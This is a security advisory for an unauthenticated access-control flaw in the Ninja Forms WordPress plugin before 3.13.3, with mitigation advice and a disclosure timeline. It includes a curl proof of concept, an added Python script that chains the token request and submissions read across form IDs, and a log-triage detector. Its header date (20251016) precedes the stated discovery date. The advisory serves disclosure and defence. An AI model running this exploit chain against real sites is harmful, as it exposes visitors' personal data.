Marco Lunardi discovered a high-impact vulnerability in Ninja Forms < 3.13.3 that allows unauthenticated remote attackers to generate valid access tokens and fully disclose stored form submissions via exposed REST API endpoints. The issue stems from a complete lack of authentication and authorization checks in the token refresh mechanism, enabling arbitrary enumeration of form IDs and unauthorized access to sensitive user data.
Given the severity of the flaw and the widespread deployment of the plugin, the vulnerability poses significant privacy and compliance risks for affected websites.
Unauthenticated Token Generation and Submission Disclosure in Ninja Forms < 3.13.3
Name Unauthenticated Token Forging and Data Exposure
Systems Affected WordPress - Ninja Forms < 3.13.3
Severity High 7.5/10
Impact CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vendor https://wordpress.org/plugins/ninja-forms/
Advisory https://www.ush.it/team/ush/hack-ninja-forms/token-ninja-forms-3.13.3.txt
Authors Marco Lunardi
Date 20251016
I. BACKGROUND
Ninja Forms is one of the most widely used WordPress form builders,
installed on hundreds of thousands of websites globally. The plugin
allows administrators to create contact forms, collect submissions and
manage user-provided data from within the WordPress dashboard.
II. DESCRIPTION
A high-severity vulnerability has been identified in Ninja Forms versions
prior to 3.13.3 which allows unauthenticated attackers to generate valid access
tokens for arbitrary form IDs. These tokens are issued via a publicly
accessible REST API endpoint designed to refresh authentication tokens.
The endpoint responsible for token generation performs no user
authentication, capability check, or nonce validation, meaning any
remote user can request and obtain a valid token. The issued token is
then accepted by further REST API endpoints that expose form submission
data.
As a result, any unauthenticated attacker can enumerate form identifiers
and retrieve stored submissions including names, email addresses and any
other personal or sensitive data submitted via affected forms.
This constitutes a severe Broken Access Control condition combined with
sensitive information disclosure.
III. ANALYSIS
Practical confirmed impacts include:
- Complete disclosure of stored form submissions
- Exposure of personal and potentially sensitive user data
- Violation of data protection and privacy obligations
- Risk of GDPR non-compliance for EU-based website owners
Proof of Concept
1. Create a form and note the Form ID (ex: 1)
2. Submit an entry.
3. Generate a valid token without authentication:
curl -X POST "http://example.com/?rest_route=/ninja-forms-views/token/refresh" -d "formIds[]=1"
Example output:
{"token": "<TOKEN>", "publicKey": "...", "expiresIn": 900, "formIds": [1]}
4. Use the token to read all submissions:
curl "http://example.com/?rest_route=/ninja-forms-views/forms/1/submissions" -H "X-NinjaFormsViews-Auth: <TOKEN>"
Example output:
{"1": "Alice", "2": "<EMAIL>", "3": "Test message"}
This confirms complete disclosure of all form data.
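The two requests above, chained as a script. This is an added example and not code from the original advisory or from the Ninja Forms project. It assumes the ?rest_route= addressing and the JSON shapes shown in the PoC output; the canned responses it ships with (the error codes and the 404 for unknown form IDs) are constructed to stand in for a live site, not observed plugin behaviour. The HTTP layer is a parameter, so the same functions run offline against the canned responses or, with urllib_transport, against a host you are authorised to test. The check reports the number of fields returned per form rather than the values, so confirming exposure does not copy personal data out of the target.

```python
"""Scripted form of the two-request chain in the advisory's PoC.

Added example, not code from the original advisory or from Ninja Forms.
Assumptions beyond the advisory: the target accepts the ?rest_route=
addressing used in the PoC, the token response is JSON with a "token"
key as in the example output, and the canned responses below (error
codes, 404 for unknown form IDs) are constructed, not observed plugin
behaviour. The HTTP layer is injected so the chain runs offline.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional, Tuple

TOKEN_ROUTE = "/ninja-forms-views/token/refresh"
SUBMISSIONS_ROUTE = "/ninja-forms-views/forms/{form_id}/submissions"
AUTH_HEADER = "X-NinjaFormsViews-Auth"

# A transport takes (method, url, headers, body) and returns (status, body_text).
Transport = Callable[[str, str, Dict[str, str], Optional[bytes]], Tuple[int, str]]


def urllib_transport(method, url, headers, body):
    """Live transport, for hosts you are authorised to test."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def rest_url(base: str, route: str) -> str:
    """Same ?rest_route= addressing as the advisory's curl commands."""
    return base.rstrip("/") + "/?rest_route=" + route


def request_token(base: str, form_id: int, transport: Transport) -> Optional[str]:
    """PoC step 3: POST formIds[] with no cookie, nonce or credentials.
    Returns the token, or None when the endpoint does not issue one."""
    body = urllib.parse.urlencode([("formIds[]", form_id)]).encode()
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    status, text = transport("POST", rest_url(base, TOKEN_ROUTE), headers, body)
    if status != 200:
        return None
    try:
        token = json.loads(text).get("token")
    except (json.JSONDecodeError, AttributeError):
        return None
    return token if isinstance(token, str) and token else None


def fetch_submissions(base: str, form_id: int, token: str,
                      transport: Transport) -> Optional[dict]:
    """PoC step 4: replay the token in the plugin's custom auth header."""
    url = rest_url(base, SUBMISSIONS_ROUTE.format(form_id=form_id))
    status, text = transport("GET", url, {AUTH_HEADER: token}, None)
    if status != 200:
        return None
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return None
    return data if isinstance(data, dict) else None


def check_target(base: str, transport: Transport, max_form_id: int = 5) -> dict:
    """Walk form IDs 1..max_form_id as the advisory describes. Records which
    forms issued a token and how many fields came back, not the values, so
    a confirmation run does not copy personal data off the target."""
    result = {"tokens_issued": [], "readable_forms": {}}
    for form_id in range(1, max_form_id + 1):
        token = request_token(base, form_id, transport)
        if token is None:
            continue
        result["tokens_issued"].append(form_id)
        data = fetch_submissions(base, form_id, token, transport)
        if data is not None:
            result["readable_forms"][form_id] = len(data)
    result["vulnerable"] = bool(result["readable_forms"])
    return result


# Constructed canned transports mirroring the advisory's example output.
def canned_vulnerable(method, url, headers, body):
    """Unpatched behaviour: anonymous token for form 1, then its data."""
    if method == "POST" and url.endswith(TOKEN_ROUTE):
        form_id = int(urllib.parse.parse_qs(body.decode())["formIds[]"][0])
        if form_id == 1:
            return 200, json.dumps({"token": "tok-1", "publicKey": "pk",
                                    "expiresIn": 900, "formIds": [1]})
        return 404, json.dumps({"code": "not_found"})
    if (method == "GET" and url.endswith("/forms/1/submissions")
            and headers.get(AUTH_HEADER) == "tok-1"):
        return 200, json.dumps({"1": "Alice", "2": "alice@example.com",
                                "3": "Test message"})
    return 403, json.dumps({"code": "rest_forbidden"})


def canned_patched(method, url, headers, body):
    """Fixed behaviour: the anonymous refresh is refused, so nothing follows."""
    return 401, json.dumps({"code": "rest_not_logged_in"})
```

Against a live host, call check_target("https://target.example", urllib_transport); a site on 3.13.3 or later should behave like canned_patched, with no token issued to the anonymous POST and therefore nothing readable.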
IV. AFFECTED VERSIONS
Confirmed affected:
- Ninja Forms < 3.13.3
Earlier versions may also be affected but were not tested.
V. CVSS 3.1
CVSS Base Score: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
VI. ROOT CAUSE
The REST endpoint responsible for generating access tokens does not
enforce any authentication or authorization controls, allowing anonymous
users to request valid tokens. These tokens are subsequently trusted by
other endpoints handling submission data access.
VII. MITIGATION
Website administrators should:
- Update Ninja Forms to version 3.13.3 or later, which contains the fix
- Revoke any previously issued access tokens
- Audit access logs for suspicious submission access activities
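To act on the last point, here is an added example (not part of the original advisory or of Ninja Forms) that triages combined-format access logs for the request chain shown in the PoC. The log lines are constructed. It assumes, beyond what the advisory states, that the same REST namespace is also served under /wp-json/ninja-forms-views/ when pretty permalinks are enabled (standard WordPress routing) and that a legitimate dashboard user would also have requested something under /wp-admin/ or /wp-login.php from the same address. The X-NinjaFormsViews-Auth header never reaches the access log, so the output is a triage list, not proof of compromise.

```python
"""Triage of web-server access logs for the request chain in the PoC.

Added example, not part of the original advisory or of Ninja Forms. The
log lines are constructed (Apache/Nginx "combined" format). Assumptions
beyond the advisory: with pretty permalinks the same namespace is also
served as /wp-json/ninja-forms-views/... (standard WordPress routing),
and a legitimate dashboard session would have touched /wp-admin/ or
/wp-login.php from the same address. The auth header never appears in
access logs, so this is a triage heuristic, not proof of compromise.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, Optional

# Constructed sample: one anonymous enumeration run, one admin session, one bystander.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Dec/2025:10:15:01 +0000] "POST /?rest_route=/ninja-forms-views/token/refresh HTTP/1.1" 200 143 "-" "curl/8.5.0"
203.0.113.7 - - [08/Dec/2025:10:15:02 +0000] "GET /?rest_route=/ninja-forms-views/forms/1/submissions HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [08/Dec/2025:10:15:02 +0000] "GET /?rest_route=/ninja-forms-views/forms/2/submissions HTTP/1.1" 200 734 "-" "curl/8.5.0"
203.0.113.7 - - [08/Dec/2025:10:15:03 +0000] "GET /?rest_route=/ninja-forms-views/forms/3/submissions HTTP/1.1" 200 98 "-" "curl/8.5.0"
198.51.100.5 - - [08/Dec/2025:11:02:10 +0000] "GET /wp-admin/admin.php?page=ninja-forms HTTP/1.1" 200 20411 "-" "Mozilla/5.0"
198.51.100.5 - - [08/Dec/2025:11:02:12 +0000] "POST /wp-json/ninja-forms-views/token/refresh HTTP/1.1" 200 143 "https://example.com/wp-admin/admin.php?page=ninja-forms" "Mozilla/5.0"
198.51.100.5 - - [08/Dec/2025:11:02:13 +0000] "GET /wp-json/ninja-forms-views/forms/1/submissions HTTP/1.1" 200 512 "https://example.com/wp-admin/admin.php?page=ninja-forms" "Mozilla/5.0"
192.0.2.9 - - [08/Dec/2025:11:30:00 +0000] "GET /contact/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# Matches both ?rest_route=/ninja-forms-views/... and /wp-json/ninja-forms-views/...
ROUTE_RE = re.compile(r"ninja-forms-views/(?:(token/refresh)|forms/(\d+)/submissions)")
ADMIN_PREFIXES = ("/wp-admin/", "/wp-login.php")


def parse_line(line: str) -> Optional[dict]:
    """Pull client IP, method, request path and status out of a combined-log line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return {"ip": ip, "method": method, "path": path, "status": int(status)}


def analyze(lines: Iterable[str], enum_threshold: int = 3) -> Dict[str, dict]:
    """Per client address, count token refreshes and submissions reads on the
    ninja-forms-views namespace, then flag the pattern from the advisory:
    token refresh followed by submissions reads with no dashboard activity,
    or reads spread over enum_threshold or more distinct form IDs."""
    admin_ips = set()
    stats = defaultdict(lambda: {"token_refreshes": 0, "submission_hits": 0,
                                 "form_ids": set()})
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["path"].startswith(ADMIN_PREFIXES):
            admin_ips.add(rec["ip"])
        m = ROUTE_RE.search(rec["path"])
        if not m:
            continue
        s = stats[rec["ip"]]
        if m.group(1):
            s["token_refreshes"] += 1
        else:
            s["submission_hits"] += 1
            s["form_ids"].add(int(m.group(2)))

    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["token_refreshes"] and s["submission_hits"] and ip not in admin_ips:
            reasons.append("token refresh then submissions read, no /wp-admin/ "
                           "or login activity from this address")
        if len(s["form_ids"]) >= enum_threshold:
            reasons.append(f"submissions requested for {len(s['form_ids'])} "
                           f"distinct form IDs (enumeration)")
        findings[ip] = {
            "token_refreshes": s["token_refreshes"],
            "submission_hits": s["submission_hits"],
            "form_ids": sorted(s["form_ids"]),
            "touched_admin": ip in admin_ips,
            "suspicious": bool(reasons),
            "reasons": reasons,
        }
    return findings


if __name__ == "__main__":
    for ip, f in analyze(SAMPLE_LOG.splitlines()).items():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{ip:15} {flag:10} forms={f['form_ids']} {'; '.join(f['reasons'])}")
```

Feed real logs with analyze(open("access.log")). Any address flagged for the token-then-submissions pattern before the upgrade to 3.13.3 should be treated as a possible disclosure of every form it touched, since a 200 on the submissions endpoint means the data left the server.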
VIII. CVE INFORMATION
CVE-2025-14072 has been officially published.
https://www.cve.org/CVERecord?id=CVE-2025-14072
IX. DISCLOSURE TIMELINE
20251116 Vulnerability discovered
20251117 Issue reported to WPScan
20251204 WPScan reviews the vulnerability
20251204 WPScan confirms the vulnerability and assigns CVE-2025-14072
20251208 Vendor releases updated Ninja Forms version 3.13.3 containing the fix
X. CREDIT
This vulnerability was discovered by Marco Lunardi with contributions by
Francesco "ascii" Ongaro and Pasquale "sid" Fiorillo.
XI. LEGAL NOTICE
Copyright (c) 2026 Marco Lunardi
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.